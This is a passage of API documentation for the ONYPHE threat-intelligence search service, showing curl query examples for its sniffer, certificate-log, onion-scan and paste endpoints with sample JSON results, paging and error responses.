"@timestamp": "2018-10-25T21:03:02.000Z",
"@type": "doc",
"asn": "AS10229",
"country": "HK",
"domain": "engadget.com",
"forward": "engadget.com",
"ip": "124.108.115.87",
"ipv6": "false",
"location": "22.2500,114.1667",
"organization": "Internet Content Provider",
"seen_date": "2018-10-25",
"source": "pastries",
"subnet": "124.108.112.0/20",
"tld": "com",
"type": "forward"
},
[..]
],
"status": "ok",
"took": "1.008",
"total": 184
This method requires an API key and a subscription to a Plan. It will return sniffer information we have for the given query with history of changes. Multiple sniffer entries may match. We return all of them, on a page by page basis (10 results per page).
Here is an example of a query string: ip:14.164.0.0/14.
curl -XGET 'https://www.onyphe.io/api/search/sniffer/ip:14.164.0.0/14?apikey={apikey}'
{
"count": 10,
"error": 0,
"max_page": 38,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "sniffer",
"@timestamp": "2018-10-26T08:55:39.000Z",
"@type": "doc",
"asn": "AS45899",
"city": "Can Tho",
"country": "VN",
"data": "k\\xa6\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\x00\\x00!\\x00\\x01",
"datamd5": "9e172f3c20c7af5b5776dc0d1177c97c",
"destport": "137",
"domain": "vnpt.vn",
"host": "static",
"ip": "14.164.46.122",
"ipv6": "false",
"location": "10.0333,105.7833",
"organization": "VNPT Corp",
"reverse": "static.vnpt.vn",
"seen_date": "2018-10-26",
"srcport": "17453",
"subnet": "14.164.0.0/14",
"tag": [
"hasreverse",
"netbiosns",
"udpdata"
],
"tld": "vn",
"transport": "udp",
"type": "udpdata"
},
[..]
],
"status": "ok",
"took": "0.045",
"total": 374
}
This method requires an API key and a subscription to a Plan. It will return ctl information we have for the given query with history of changes. Multiple ctl entries may match. We return all of them, on a page by page basis (10 results per page).
Here is an example of a query string: host:vpn.
curl -XGET 'https://www.onyphe.io/api/search/ctl/host:vpn?apikey={apikey}'
{
"count": 10,
"error": 0,
"max_page": 96,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "ctl",
"@timestamp": "2018-10-26T11:45:56.000Z",
"@type": "doc",
"basicconstraints": [
"critical"
],
"ca": "false",
"domain": "freese-feldhaus.de",
"extkeyusage": [
"serverAuth",
"clientAuth"
],
"fingerprint": {
"md5": "63dc7530020e76cd599e914b1ede8e8e",
"sha1": "ba4ef99d26ae0514076e33c3f5f7da40716427b9",
"sha256": "b2b52ca06085edc1240177aaee0b6704ac9f6ebe178d5774d76de4a969fe8aac"
},
"host": "vpn",
"ip": "80.228.36.150",
"issuer": {
"commonname": "COMODO RSA Domain Validation Secure Server CA",
"country": "GB",
"organization": "COMODO CA Limited"
},
"keyusage": [
"critical",
"digitalSignature",
"keyEncipherment"
],
"publickey": {
"algorithm": "rsaEncryption",
"exponent": "65537",
"length": "2048"
},
"seen_date": "2018-10-26",
"serial": "03:41:31:f7:9c:1c:f7:c0:59:db:b9:09:a2:aa:06:44",
"signature": {
"algorithm": "sha256WithRSAEncryption"
},
"source": "Cloudflare Nimbus 2020",
"subject": {
"altname": [
"vpn.freese-feldhaus.de",
"www.vpn.freese-feldhaus.de"
],
"commonname": "www.vpn.freese-feldhaus.de"
},
"tld": "de",
"validity": {
"notafter": "2020-10-25T23:59:59.000Z",
"notbefore": "2018-10-26T00:00:00.000Z"
},
"version": "v3",
"wildcard": "false"
},
[..]
],
"status": "ok",
"took": "0.017",
"total": 952
}
This method requires an API key and a subscription to a Plan. It will return onionscan information we have for the given query with history of changes. Multiple onionscan entries may match. We return all of them, on a page by page basis (10 results per page).
Here is an example of a query string: data:market.
curl -XGET 'https://www.onyphe.io/api/search/onionscan/app.http.keywords:dump?apikey={apikey}'
"count": 10,
"error": 0,
"max_page": 6,
"myip": "<redacted>",
"page": 1,
"results": [
{
"@category": "onionscan",
"@timestamp": "2018-10-24T15:34:33.000Z",
"@type": "doc",
"app": {
"extract": {
"domain": [
"torbox3uiot6wchz.onion"
],
"hostname": [
"torbox3uiot6wchz.onion"
]
},
"http": {
"bodymd5": "d41d8cd98f00b204e9800998ecf8427e",
"headermd5": "4e377d4ab7621ffd56021329b8d1a287",
"keywords": [
"pump and dump campaign"
],
"title": "Pump and Dump campaign"
},
"length": "4096"
},
"cpe": [
"cpe:/a:apache:http_server:-"
],
"data": "HTTP/1.1 200 OK\r\nContent-Length: 3807\r\nETag: \"edf-572335ae02dac\"\r\nDate: Wed, 24 Oct 2018 15:40:36 GMT\r\nLast-Modified: Mon, 30 Jul 2018 08:36:17 GMT\r\nServer: Apache\r\nAccept-Ranges: bytes\r\nVary: Accept-Encoding\r\nX-Content-Type-Options: nosniff\r\nX-Frame-Options: sameorigin\r\nX-XSS-Protection: 1; mode=block\r\nContent-Type: text/html\r\nAge: 1\r\nConnection: keep-alive\r\n\r\n<U+FEFF><!DOCTYPE html>\r\n<html><head>\r\n <title> Pump and Dump campaign</title>\r\n <meta name=\"description\" content=\" pump and dump campaign\">\r\n <meta name=\"keywords\" content=\" pump and dump campaign\">\r\n <meta http-equiv=\"content-type\" content=\"text/html; charset=UTF-8\">\r\n <link rel=\"stylesheet\" type=\"text/css\" href=\"index_files/circle.css\">\r\n <link rel=\"stylesheet\" type=\"text/css\" href=\"index_files/style.css\" title=\"style\"> \r\n</head>\r\n<body>\r\n <div id=\"main\">\r\n <div id=\"header\">\r\n <div id=\"logo\">\r\n
[..]
"datamd5": "06866e092c569a9df0a1ff1b4bb43176",
"device": {
"class": "Web Server"
},
"domain": "il2mmv4hhq6qodikzajvqjqiqnfmc4on3uyvi7bsande2x5ldnq2scqd.onion",
"hostname": "il2mmv4hhq6qodikzajvqjqiqnfmc4on3uyvi7bsande2x5ldnq2scqd.onion",
"onion": "il2mmv4hhq6qodikzajvqjqiqnfmc4on3uyvi7bsande2x5ldnq2scqd.onion",
"port": 80,
"product": "HTTP Server",
"productvendor": "Apache",
"protocol": "http",
"protocolversion": "1.1",
"reason": "OK",
"seen_date": "2018-10-24",
"source": "datascan",
"status": "200",
"tag": [
"ok"
],
"tls": "false",
"url": "/"
},
[..]
],
"status": "ok",
"took": "0.158",
"total": 60
}
When there are more than 10 results and you have a subscription to a Plan, you can page through available results (up to 10000 results). To do so, you just have to add the page parameter to your HTTP request.
curl -XGET 'https://www.onyphe.io/api/search/pastries/domain:amazonaws.com?page=2&apikey={apikey}'
{
"count": 10,
"error": 0,
"max_page": 1000,
"myip": "<redacted>",
"page": "2",
"results": [
[..]
],
"status": "ok",
"took": "0.027",
"total": 15457
}
A response will be returned with a 200 HTTP code. A non-zero positive error code will be returned along with a descriptive message.
{
"error": 3,
"message": "invalid apikey given",
"myip": "<redacted>",
"status": "nok"
}
If rate limiting is triggered, a response will be returned with a 429 HTTP code. Currently, the limit is set to 20 requests per minute from a given IP address.
* This product includes GeoLite2 data created by MaxMind, available from http://www.maxmind.com.